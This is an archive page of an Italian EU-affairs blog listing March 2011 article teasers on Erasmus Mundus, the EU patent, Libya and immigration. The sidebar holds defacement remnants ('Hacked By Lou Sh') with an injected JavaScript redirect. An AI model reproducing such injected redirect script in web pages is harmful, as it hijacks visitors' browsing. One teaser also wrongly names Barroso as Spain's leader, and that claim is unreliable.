EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Marzo 2011
it

L'ente sostiene la cooperazione e lo scambio culturale nelle loro dimensioni sociali, con lo scopo di costruire un'Europa aperta e democratica, rispettosa dei diritti umani fondamentali e della diversità culturale dei suoi cittadini. attraverso un programma di sovvenzioni.

I programmi di finanziamento istituiti nella fondazione allo scopo di favorire le iniziative culturali e i progetti di gruppo e promuovere la creatività dei giovani sono due: I. Sovvenzioni per opere di collaborazione fra organizzazioni culturali. Finanziamenti ordinati per stimolare la (...)

it

Nel corso delle prossime pubblicazioni cercheremo di presentarvi ogni aspetto di questo vastissimo Programma, che si propone di offrire opportunità concrete di crescita alle istituzioni superiori per l'istruzione, così come a tutte le persone che operano in queste realtà.

Studenti, dottorandi, ricercatori, docenti, funzionari pubblici o privati non potranno farsi scappare le opportunità offerte dal progetto “Erasmus Mundus”. E lo stesso vale più in generale per Università, enti di formazione e ricerca. Un programma globale e molto articolato, che riesce a soddisfare (...)

it

Ravenna, Venezia, Torino, L’Aquila, Siena, Assisi, Perugia, Amalfi, Bari, Brindisi, Matera, Palermo e Catanzaro: dal nord al sud, queste città rappresentano la cultura italiana in tutte le sue espressioni. Un richiamo della manifestazione che può giovare a tutti, anche alle industrie.

Il riconoscimento di Capitale Europea della Cultura nasce nel 1999 da un opera congiunta del Parlamento Europeo e del Consiglio d’Europa, con gli obiettivi di promuovere la cooperazione tra operatori culturali, artisti e città degli Stati membri, e di valorizzare la ricchezza della diversità (...)

it

“Se ho scelto Dublino per scena è perché quella città mi appariva come il centro della paralisi”. Nel 1906, lo scrittore irlandese James Joyce, profondo conoscitore delle tradizioni dei dubliners, aveva già capito quali sarebbero state le sorti future dell’isola di smeraldo. Neanche dopo un secolo, infatti l’Irlanda si trova a vivere uno dei momenti più difficili della sua storia, secondo solo all’eterno conflitto con gli inglesi per l’Irlanda del Nord.

In verità, nelle parole di Joyce non c’è nulla di divinamente premonitore, ma solamente la scoperta di una costante che sembra accompagnare il destino degli irlandesi: la crisi. Nel novembre 2010, per risolvere il dramma del crollo finanziario dei mutui immobiliari, la Banca Centrale Europea (...)

it

Ma l’UE ha manifestato non poche perplessità in seguito all' incontro del 18 ottobre scorso a Deauville tra il primo ministro francese e il cancelliere tedesco, da cui è scaturito il “patto sulla competitività” per uscire dalla crisi.

Come disse John F. Kennedy, “nella scrittura cinese la parola crisi è composta da due ideogrammi: uno rappresenta il pericolo e l’altro l’opportunità”. Questo è quello che sembrano professare la Francia e la Germania con il patto di competitività avanzato dai loro rispettivi leader Nicolas Sarkozy e (...)

it

Guardare in televisione gratuitamente le partite degli europei e dei mondiali da oggi è un diritto tutelato dall’ Unione Europea.

Sulla questione delle esclusive per la pay tv si è espresso proprio in questi giorni il tribunale generale dell’Unione Europea. La sentenza comunica ufficialmente la possibilità di poter vedere gratuitamente in tv le partite degli europei, dei mondiali e qualsiasi evento sportivo di particolare (...)

it

Le previsioni stilate dalla Commissione Europea per l'anno 2001 per calcolare quando l’inflazione inciderà sui Paesi non sono confortevoli per nessun Stato europeo. È costretta a rivedere le previsioni per il 2011 e deve confermare un aumento dell’inflazione per quest’anno pari al 2,2% nell’Eurozona.

Guardando le nuove cifre stilate dalla commissione europea per quel che riguarda l’inflazione quest’anno, non c’è da star tranquilli. Tutti i Paesi membri e non, dovranno fare i conti con un aumento dei prezzi che non si vedeva da anni ormai. In Italia sembra prospettarsi la situazione più (...)

it

La cooperazione rafforzata rappresenta una soluzione estrema per andare avanti nell’iter legislativo senza Italia e Spagna, oppostesi in blocco in merito alla questione linguistica, che prevede la possibilità di creare il brevetto in tre lingue (inglese, francese e tedesco) escludendone altre e creando così problemi di competitività, oltre alla presunta violazione del principio del multilinguismo europeo. La questione sembra essersi sbloccata, ma la Corte di Giustizia è chiamata a pronunciarsi sulla compatibilità con i trattati UE.

Continua l’infinita vicenda del brevetto unico europeo. Come già auspicato sul nostro sito nelle scorse settimane, il Parlamento Europeo ha approvato la risoluzione presentata dall’europarlamentare Klaus-Heiner Lehne (PPE) riguardo la procedura di cooperazione rafforzata a maggioranza qualificata. (...)

it

Commissione Europea e l'EACEA sono insieme responsabili del Programma Erasmus Mundus. La Commissione si occupa della gestione del bilancio del Programma, oltre a monitorare e coordinare le attività a livello europeo. L’EACEA - Education, Audiovisual and Culture Executive Agency (Agenzia esecutiva per l’istruzione, gli audiovisivi e la cultura) gestisce gli aspetti pratici degli eventi, dalla pubblicazione dei Calls, passando per le varie selezioni, fino ad arrivare all’assegnazione di finanziamenti, grant e borse di studio. Dopo aver visto in generale in cosa consiste il grande progetto dell’Erasmus Mundus, in questo articolo cercheremo di spiegare le procedure riservate agli studenti italiani ed europei che vogliano prendere parte al Programma.

L’Erasmus Mundus si avvale di Strutture nazionali per comunicare con gli studenti nei Paesi membri dell’Unione europea e nei Paesi See-Efta. Per quanto riguarda l’Italia, le funzioni di struttura nazionale sono svolte dal Punto nazionale di contatto - Italia Erasmus Mundus. Possono partecipare al (...)

it

Al via la sedicesima edizione della Carovana antimafie, un viaggio di 96 giorni che parte simbolicamente da Roma e abbraccia l’Italia intera, con oltre 17mila chilometri per 123 tappe.

Parte dalla Capitale l’edizione 2011 del percorso itinerante organizzato da Arci, Libera e Avviso Pubblico, il viaggio simbolo della legalità Roma-Corleone, passando per l’Europa. L’evento è stato presentato a Roma dal procuratore nazionale antimafia Pietro Grasso, Luigi Ciotti di Libera, Paolo Beni (...)

it

Il caso libico ha scatenato nella storia recente delle rivoluzioni popolari del Nordafrica la reazione più rapida della comunità internazionale. Gli Usa e l’Ue hanno imposto delle sanzioni. Il Consiglio di Sicurezza dell’Onu ha approvato all’unanimità una risoluzione che decreta l’embargo di armi, (...)

it

Per l’Unione Europea i cambiamenti climatici continuano ad essere una priorità. Pochi giorni fa, con una dotazione di 90 mln alle Regioni più povere del Pacifico, il Commissario Andris Pieblags ha ribadito l’impegno dell’UE, insieme a tutta la Comunità Internazionale, a costruire programmi per favorire l’adattamento, la gestione delle energie, delle materie prime e delle risorse naturali in caso di catastrofi.

Durante il Forum degli Stati del Pacifico, conclusosi il 4 marzo, la comunità internazionale ha rimarcato la necessità di contribuire al mantenimento di quei paesi delle Isole del Pacifico che, a causa dei disastri provocati dai rapidi cambiamenti climatici, vedono il loro PIL sprofondare di anno (...)

it

Dopo il varo del documento dei diritti per chi viaggia in aereo, in treno e per via marittima, l’Europarlamento ha proposto una serie di tutele anche per i passeggeri di autobus di linea e pullman, ultimo nodo per completare la rete delle infrastrutture. La legge prevedrà casi di risarcimento e di assistenza in situazioni incidentali.

“Grazie a questo nuovo regolamento, i diritti dei passeggeri si estenderanno anche a chi viaggia in autobus di linea o pullman. Gli utenti dei trasporti su strada beneficeranno delle stesse norme di base in materia di qualità dei servizi”. Con queste parole Siim Kallas, Vicepresidente della (...)

it

In Italia, difronte alla scarsa presenza delle donne nell'occupazione di posti rilevanti, l' unico modo e strumento efficace per poter evitare di perdere talenti femminili è l 'introduzione della legge sulle quote rosa. ''Regole legislative che fissano un minimo di donne o una proporzione da rispettare per entrambi i sessi nel momento in cui vengono costituite le liste elettorali".

E’ stato scelto l’8 marzo, giorno che celebra le donne, per approvare la legge che dovrebbe porre fine alle disparità che separano l’Italia dal resto d’Europa, infatti nella maggior parte dei paesi europei la legge sulle quote rosa nei c.d.a. è già passata da tempo. Le percentuali ci mostrano (...)

it

La donna è un mistero. Capirla, comprenderla, significherebbe già ridurla della propria essenza. Afferrarla, possederla, sarebbe di per se un delitto. Il suo fascino, la sua bellezza sono un enigma che si svela lentamente. Una creatura meravigliosa che in tutte le culture rimanda al divino.

The Times, agosto 2010, la foto in copertina di Aisha Bibi, donna afghana sfigurata per pagare un debito di sangue, ci mostra il volto di una umanità ferita. Parlamento Europeo di Strasburgo, 8 marzo 2011, parte l’iniziativa “I Sorrisi invisibili” (ore 15.30 presso la Sala stampa) contro la (...)

it

La Commissione europea ha stanziato 170 milioni di euro per rilanciare le infrastrutture continentali ed intraprendere una direzione più ecologica per le reti dei trasporti.

Oggi Bruxelles sembra riaprire il discorso di mcluhaniana memoria del villaggio globale: la Commissione ha pubblicato l’elenco dei 51 progetti che beneficeranno dei fondi per migliorare le reti transeuropee dei trasporti(TEN-T, uno dei mezzi più importanti di finanziamento delle infrastrutture). (...)

it

Si sono aperte in questi giorni le iscrizioni per il concorso fotografico rivolto a tutti gli studenti europei. Promosso in Italia dal Ministero dell'Istruzione in collaborazione con l'Ufficio Scolastico Regionale per le Marche e altri paesi dell'UE.

“Let me show you the world in my eyes” cosi cantavano i Depeche Mode in una celebre canzone del 1990. “Lascia che ti mostri il mondo nei miei occhi” proprio così: si tratta di un invito chiaro, preciso, perchè ognuno di noi infatti vede il mondo a modo suo, ognuno di noi coglie sfumature diverse, (...)

it

Quest’anno è stata una coccarda rosa, non la classica mimosa, il simbolo della Giornata mondiale della donna; un fiocco virtuale, spiegano le donne, attrici, registe, politiche, storiche e giornaliste, con cui legarsi tutte, nel 150° Anniversario dell’Unità d’Italia, per una rinascita del nostro Paese.

Le mimose appassite del giorno dopo: 8 Marzo, Festa della donna. Più che donna, Cenerentola; la festa è finita, si mettono da parte fiori e i cioccolatini e torna un nuovo giorno, un giorno qualsiasi. Nel giorno qualsiasi, la donna italiana si scontra coi soliti vecchi fantasmi, sospesa fra il (...)

it

E' già pronta a partire la seconda edizione di Talea G2 leadership summer school, un corso rivolto a tutti gli immigrati che si sono distinti durante gli studi universitari con percorsi di eccellenza. Un iniziativa che nasce dalla consapevolezza che oggi i giovani stranieri preparati e qualificati sono quasi invisibili ed assenti nel mondo del lavoro italiano.

Il nuovo corso, rivolto a tutti i giovani immigrati laureati sta per prendere il via. La fondazione nasce dalla consapevolezza che un gran numero di immigrati laureati svolge un lavoro non qualificato rispetto alla sua preparazione, come ci spiegano i fondatori dell’organizzazione. I giovani (...)

it

Muammar Gheddafi ha accusato gli occidentali, in particolare la Francia, di condurre un "complotto colonialista" contro il suo paese, in una intervista diffusa dalla tv francese LCI.

A una domanda sulle posizioni dei paesi occidentali, ed in particolare della Francia, che hanno dato il loro sostegno agli insorti, Gheddafi ha risposto: "Vogliono colonizzare la Libia di nuovo. E’ un complotto colonialista". Quando il giornalista gli ha chiesto se prevede di adottare delle (...)

it

Le università di Madrid, Monaco, Parigi , Oxford e il Politecnico di Torino insieme per lavorare ad un nuovo progetto: l’ ULAB. Scopo del lavoro quello di migliorare l’università stessa, dal settore della ricerca alla divulgazione scientifica.

“European Laboratory for modelling the technical research University of tomorrow”, altrimenti detto ULAB. È questo il nuovo progetto, accordato e finanziato dalla Commissione Europea nel programma “Scienza nella Società” del settimo Programma Quadro di Ricerca e Sviluppo Tecnologico. Cinque (...)

16
03
2011

E-commerce

it

E' stata proposta in questi giorni da Maglena Kuneva,commissaria dei Consumatori per l'Unione, una nuova legislazione sul commercio in rete. In tutte le nazioni dell'UE dovranno essere applicate le stesse leggi anche per quanto riguarda questo nuovo tipo di mercato.

Oggi la navigazione in internet è ormai un’attività praticata da moltissime persone con un’età media compresa tra i quattordici e i sessantacinque anni. Fra le varie opzioni che il mondo telematico ci propone e che sta prendendo sempre più piede c’è sicuramente quella degli acquisti on-line. Con pochi, (...)

it

In questa parte verranno illustrati i corsi di dottorato congiunto Erasmus Mundus Emjd e le borse di ricerca fellowship per i studenti che vorranno partecipare al progetto.

Come appreso dai precedenti articoli sul tema, Erasmus Mundus è un programma di “cooperazione nel campo dell’istruzione superiore volto a promuovere l’immagine dell’Unione Europea come luogo di eccellenza per proseguire i propri studi di istruzione”. Si tratta di corsi di laurea, master universitari (...)

it

Cercheremo di approfondire in maniera dilazionata un tema importante come quello della politica estera italiana a 150 anni dall'unità. Le principali attività, interessi e le nuove sfide del nostro paese sul palcoscenico mondiale.

Nel 1861 ha avuto inizio la storia dell’Italia Unita. Il nostro paese ha fatto da culla a diverse ideologie, principi o preoccupazioni che a loro volta hanno fatto da cornice ai vari periodi storici della nostra unità: dall’epoca monarchica a quella liberale, dal fascismo all’avvento della (...)

it

Dal 6 al 9 aprile 2011, si terrà a Roma, presso il Salone delle Fontane (EUR), l’ottava edizione del “FareTurismo Italia”. Quattro giornate per formarsi nel mondo del turismo e cogliere opportunità di lavoro.

L’evento organizzato dalla Leader SAS si terrà nella capitale. Ritorna l’iniziativa che cerca di promuovere il lavoro nel mondo del turismo. Occasione per giovani laureandi e specialisti di scoprire qualcosa di più di quello che amano, che studiano, e l’opportunità, forse, di trovare anche una (...)

it

I sempre più sofisticati cookie e le crescenti paure per la privacy hanno spinto Bruxelles a compiere un ulteriore passo nel nome della tutela dei dati privati. Dal 25 maggio sarà legge la direttiva del pacchetto “ePrivacy” che non consentirà più ai siti Web di gestire i cookie senza espresso consenso degli utenti

Secondo le nuove direttive chi naviga nel mare virtuale dovrà dare l’autorizzazione per trattare i propri dati personali. Le preoccupazioni dell’UE sono rivolte ai “cookie” e il loro compito di collante tra il browser di riferimento e gli utenti. Ma cosa sono questi “biscotti”? Sono dei segmenti di (...)

it

Trascrivere i brevetti soltanto in inglese,francese e tedesco eliminando così i costi di traduzione: questa è stata la proposta dell'UE discussa in questi giorni a Bruxelles. Proposta che ovviamente fa discutere e che ha suscitato aspre reazioni da parte di Italia e Spagna che hanno definito "discriminatorio" questo progetto.Mentre entrambe le nazioni ribadiscono il loro parere negativo, la Commissione sembra decisa ad andare avanti sostenendo che questa proposta è per l'Europa intera un "test di unione e che è inoltre impensabile dover tradurre ogni singolo brevetto in 27 lingue."

Il brevetto è universalmente riconosciuto come un titolo giuridico grazie al quale colui che lo riceve e lo possiede ha un monopolio (con un’estensione massima temporale di venti anni) di sfruttamento di una qualsiasi invenzione. La legge vieta a coloro che non ne sono in possesso di riprodurre, (...)

it

È di questi giorni la notizia che in Spagna il Presidente Barroso ha deciso di abbassare a 110 km/h il limite sulle autostrade del Paese. A spingerlo a prendere questa decisione non sono stati, questa volta, motivi legati alla sicurezza. Il governo spagnolo avrebbe individuato nella riduzione della velocità l’unico sistema per combattere l’inquinamento e consumare meno carburante, conservando quanto più petrolio possibile, data anche le delicata situazione libica. Questo è il modello di Eco-Drive iberico. Ma qual è la situazione in generale in UE e in Italia? Vediamolo insieme.

Cos’è l’Eco-Drive? Eco-Driving L’Eco-Drive è un stile di guidare che riduce il consumo di benzina e, conseguentemente, le emissioni di gas nocivo nell’atmosfera, ed ha effetti positivi anche su altre forme di inquinamento, come quello acustico. Con un comportamento responsabile, intelligente ed (...)

it

Nell'arco di tre giorni, il Presidente della repubblica Giorgio Napolitano interviene sui finanziamenti alla ricerca in Italia. "No ai tagli con il machete", ha detto in occasione della visita al Cern di Ginevra. E in un messaggio per la XVI edizione della convention scientifica di Telethon chiarisce: "La ricerca è una priorità assoluta: bisogna investire con coraggio".

Nuovo monito dunque del capo dello stato a favore dei giovani e della necessità di investire sul loro futuro a partire dalla formazione: "E’ essenziale promuovere l’innalzamento degli standard formativi e valorizzare le migliori energie intellettuali e creative: soltanto investendo su tali (...)

it

Le ultime notizie utili a tutti coloro che vogliono prendere parte al progetto Erasmus Mundus riguardano il periodo di mobilità individuale.

Di cosa si tratta? Di una mobilità individuale per formazione che è finanziata da borse di studio volte a supportare studenti e studiosi nella fase di ricerca, studio ed insegnamento. In altre parole un periodo di istruzione che si svolge in un paese diverso da quello in cui ci si trova. Il (...)

it

Dopo anni di battaglie, anche di perse e scoraggianti,adesso l’Italia può dirsi vincente. Il crocefisso nelle scuole può essere riappeso; cosi ha deciso la Corte Europea. La vista del corpo martoriato del Gesù non disturberebbe i bambini, e non li influenzerebbe religiosamente.

Finalmente una vittoria. Vittoria per l’Italia, che non si è fatta intimorire dai tanti no, ed è andata avanti, perché consapevole che stavolta si aveva ragione, stavolta non bisognava lasciare andare. E così, la Grande Camera della Corte Europea dei diritti dell’uomo di Strasburgo, dopo la sentenza (...)

24
03
2011

Salute o Risparmio?

it

Nell’ambito della Convenzione firmata 17 Novembre 2010, tra la UIBM (Direzione Generale per la Lotta alla Contraffazione) del Ministero dello Sviluppo Economico e le associazioni dei consumatori (ACU – Associazione Consumatori Utenti, ADICONSUM, ADOC, ASSOUTENTI, CODICI, FEDERCONSUMATORI, MOVIMENTO DIFESA DEL CITTADINO), si inserisce l'indagine quali-quantativa realizzata su un campione di 4000 consumatori nel territorio nazionale.

Il sondaggio è parte di un insieme di attività previste dalla Convenzione per verificare ed analizzare la percezione del fenomeno contraffattivo da parte dei consumatori, indagando principalmente la dimensione del fenomeno, la reale consapevolezza rispetto ai rischi sulla salute e la sicurezza, (...)

it

La plenaria del Parlamento europeo ha approvato quasi all’unanimità, con 32 voti contrari e 60 astensioni a fronte di 576 voti favorevoli, una risoluzione per introdurre standard minimi a livello europeo per la promozione dell’integrazione sociale, economica e culturale dei rom, la minoranza etnica più grande d’Europa, con 12 milioni di persone fra tutti i paesi membri.

L’Europa deve fare passi concreti: dare lavoro e alloggi, favorire l’accesso alla pubblica amministrazione, garantire l’istruzione dei bambini con insegnanti di lingua rom e, più in generale, imporre agli stati membri di usare meglio i fondi a disposizione (17 miliardi di euro per il periodo (...)

it

Continuiamo fare il punto della situazione sulla questione della politica estera dell'Italia a 150 anni dall'Unità.

Ci eravamo soffermati precedentemente, in occasione della celebrazione dell’Unità, ad analizzare la situazione della politica Italiana. Le difficoltà e i punti deboli che oggi più che mai la caratterizzano nello scenario politico mondiale. Per la politica estera Italiana costituisce sia un punto di (...)

it

Il progetto si pone l’obiettivo di offrire così un’alta formazione ai giovani cittadini di tutta Europa, e di far acquisire le conoscenze utili al funzionamento delle istituzioni, offrendo così anche un miglioramento delle possibilità di lavoro per tutti gli studenti dell’U.E.

Da sempre l’U.E. ha un attenzione particolare per l’inserimento dei giovani studenti nel mondo del lavoro e la loro crescita culturale e professionale. La recente iniziativa promossa dal Parlamento è una ulteriore conferma della continua ricerca del miglioramento dell’integrazione dei lavoratori da (...)

it

Lo scorso 22 Marzo, come tutti gli anni, è stata celebrata la Giornata Mondiale dell’Acqua. Diciannove giornate dal 1992 per sensibilizzare la comunità mondiale a comportarsi nel modo migliore nei confronti di quello che è il bene supremo nella nostra vita.

Il mondo in cui viviamo oggi, porta a pensare di essere i padroni di tutto e di tutti. Si è pronti a scommettere che nulla di male accadrà. Si vive nell’assurda convinzione che alla fine si aggiusterà tutto, magari per magia, anche se non si crede ormai più a nulla tranne che a se stessi. È, forse, (...)

it

Ennesimo capitolo dell’interminabile saga che vede come interpreti principali Bruxelles nei panni del protagonista buono con il ruolo di garante della privacy, e l’antagonista Internet statunitense che sembra configurare scenari dittatoriali. Chi la spunterà? E soprattutto, quale sarà il destino dell’utente errante? Nello specifico la funzione della nuova direttiva UE sulla privacy dovrà essere quella di attribuire maggior potere opzionale all’utente e sanzioni più dure per chi non ottempera.

Già a dicembre dello scorso anno, l’ormai famoso Commissario europeo per la Società dell’Informazione e i Media, Viviane Reding, annunciava che l’Europa avrebbe preso dei provvedimenti sempre più mirati in difesa della cyber privacy. Tuttavia oggi la proposta si fa più seria e include sanzioni (...)

it

Dopo l'11 Marzo si guarda al Giappone ma anche all'Europa. il terremoto e lo tsunami in Giappone hanno provocato migliaia di vittime e danneggiato l'impianto nucleare di Fukushima; il pericolo più sentito oggi è quello della dispersione di radiazioni nella zona circostante. Questa catastrofe ha riportato in vita il fantasma di Chernobyl e impone ovunque di riconsiderare la questione della sicurezza negli impianti nucleari.

Dibattito sul Giappone e sul nucleare; si è tenuto mercoledì 23 marzo un incontro parlamentare di preparazione alla risoluzione di solidarietà al popolo giapponese, votata nel giorno seguente. Tutti i partecipanti hanno espresso cordoglio alle vittime e vicinanza ai sopravvissuti, un (...)

it

È stata infatti definita una strategia che dovrebbe facilitare la strada dell’U.E. verso l’unione economica, con l’adozione di un nuovo Patto per l’Euro per coordinare le politiche economiche dei Paesi membri.

La fitta agenda degli argomenti da trattare al Consiglio europeo svoltosi a Bruxelles tra il 24 e il 25 marzo era già tale ben prima del complicarsi della situazione politica in Libia e del disastro provocato dallo tsunami in Giappone. La tematica più importanti da trattare in questo Consiglio (...)

it

Il Fondo Europeo ha stanziato un milione mezzo di euro per finanziare master, dottorati e post laurea per gli studenti della Toscana. Dal 23 marzo fino al 15 aprile, gli interessati potranno presentare la loro domanda e cercare di ottenere una possibilità.

La regione Toscana torna, dopo la scorsa edizione del 2009, grazie all’aiuto del Fondo sociale Europeo, a sostenere un progetto che vedrà coinvolti giovani residenti o domiciliati nella regione in iniziative che potranno catapultarli nel mondo del lavoro. Un milione e mezzo di euro sono stati (...)

it

Proseguiamo ad analizzare la situazione del nostro Paese nello scenario politico internazionale attraverso lo studio portato avanti dal' ISPI.

Tra bilateralismo, multilateralismo e i diversi punti deboli che abbiamo analizzato negli interventi precedenti, continuiamo in questa parte a scandagliare altri fattori e situazioni che riguardano le forme e gli strumenti della proiezione internazionale dell’Italia secondo quanto presentato (...)

it

Il 31 marzo scadrà il termine ultimo per poter partecipare al concorso.E’ quindi questa l’ultima settimana per poter inviare il proprio materiale.

In un momento così delicato per l’Europa anzi per il mondo intero torna dopo il successo delle tre edizioni precedenti il Premio del Parlamento europeo per il giornalismo. Questo tipo di concorso ci invita a riflettere su quanto il giornalismo, come qualsiasi altro mezzo di comunicazione, sia un (...)

it

Genova 20 luglio 2001- Strasburgo 24 marzo 2011: ci sono voluti quasi dieci anni, ma sembra essere arrivati alla conclusione di uno degli episodi più bui della nostra storia recente.

La Corte Europea dei diritti dell’uomo di Strasburgo ha assolto lo Stato italiano dall’accusa di avere responsabilità nella morte di Carlo Giuliani, il giovane manifestante deceduto a causa degli scontri avvenuti in Piazza Alimonda durante il G8 svoltosi nel capoluogo ligure. La decisione è stata (...)

it

Sono disponibili anche quest'anno le borse di studio Bcc messe a disposizione dalla Banca Ravennate e Imolese. Di cosa si tratta?

Il credito cooperativo Ravvenate e Imolese promuove anche per quest’anno un concorso per l’assegnazione di borse di studio Bcc. Tra i requisiti principali per la richiesta della borsa di studio è necessario specificare che possono fare domanda per partecipare tutti i soci e figli dei soci della (...)

it

LA MARCIA Gli shabab, i ragazzi delle bande ribelli, sono entrati a Ras Lanuf, l’importante centro petrolifero, dopo avere occupato Brega ed altre due località minori. Più che una battaglia è stata una corsa di almeno trecento chilometri. E adesso l’obiettivo più ambizioso è la provincia della (...)

it

Riuscirà l'Italia a recuperare il suo ruolo chiave in Libia nella fase post conflitto? La relazione privilegiata tra Berlusconi e Gheddafi aiuterà a trovare una via d'uscita dalla crisi libica? Pubblichiamo un'accurata analisi (in inglese) della Prof.ssa Federiga Bindi sul ruolo dell'Italia nella crisi libica e possibili vie d'uscita

"Gaddafi must understand that it would be an act of courage to say: "I understand that I have to go’," said the Italian Foreign Minister Franco Frattini, adding: "We hope that the African Union can find a valid proposal." A senior American official suggested that a solution in which Gaddafi (...)

it

Il dibattito politico italiano in materia di immigrazione si infiamma periodicamente, in base alla cronaca nera, alla paura, alle generalizzazioni. Lo scontro tra chi vuole una società multietnica e chi la rifiuta, tra chi non tollera il velo e chi lo difende in nome della libertà religiosa, chi vorrebbe eliminare il crocifisso dalle strutture pubbliche e chi lo difende come simbolo della propria identità (occidentale), chi ricorre all'uso indiscriminato del termine "clandestino" per indicare ogni immigrato, è sempre aperto.

Naturalizzazione è il termine con cui si indica la concessione della cittadinanza ad uno straniero; viene solitamente accordata quando sussistono determinate condizioni: la residenza per un lungo periodo di tempo sul territorio nazionale, l’assenza di precedenti penali, la rinuncia alla (...)

it

“Le grandi divisioni dell'umanità e la fonte di conflitto principale saranno legate alla cultura. Gli Stati nazionali rimarranno gli attori principali nel contesto mondiale, ma i conflitti più importanti avranno luogo tra nazioni e gruppi di diverse civiltà. Lo scontro di civiltà dominerà la politica mondiale. Le linee di faglia tra le civiltà saranno le linee sulle quali si consumeranno le battaglie del futuro."

Lunedì 28 marzo 2011, ore 11.30, 40 immigrati sbarcano a Lampedusa. Questo è uno dei tanti bollettini diramati dal Ministero dell’Interno a riguardo della situazione sull’isola più a sud dell’Italia. Da venerdì sono arrivati 3.721 migranti, per raggiungere un numero complessivamente di 5.534 persone. (...)

it

In principio fu la disposizione della legislazione comunitaria risalente al 1997. Poi, venne la richiesta del Commissario Europeo alla salute John Dalli: introdurre un’etichetta per la certificazione della provenienza e del tipo di carne, per tutti i prodotti di macelleria importati. Infine, arrivò il nulla di fatto. Nonostante le dodici ore di discussione il Consiglio dei Ministri dell’Unione Europea e il Parlamento Europeo non hanno trovato un accordo in materia di documentazione e controllo delle carni d’importazione.

All’inizio c’erano le posizioni intransigenti degli Eurodeputati che pretendevano il divieto assoluto di commercializzazione di tali prodotti. Poi si è arrivati alla timida richiesta di un’etichettatura quanto mano obbligatoria. Alla fine, di nuovo, niente di fatto. Infine, alle 6:45 del 30 marzo (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France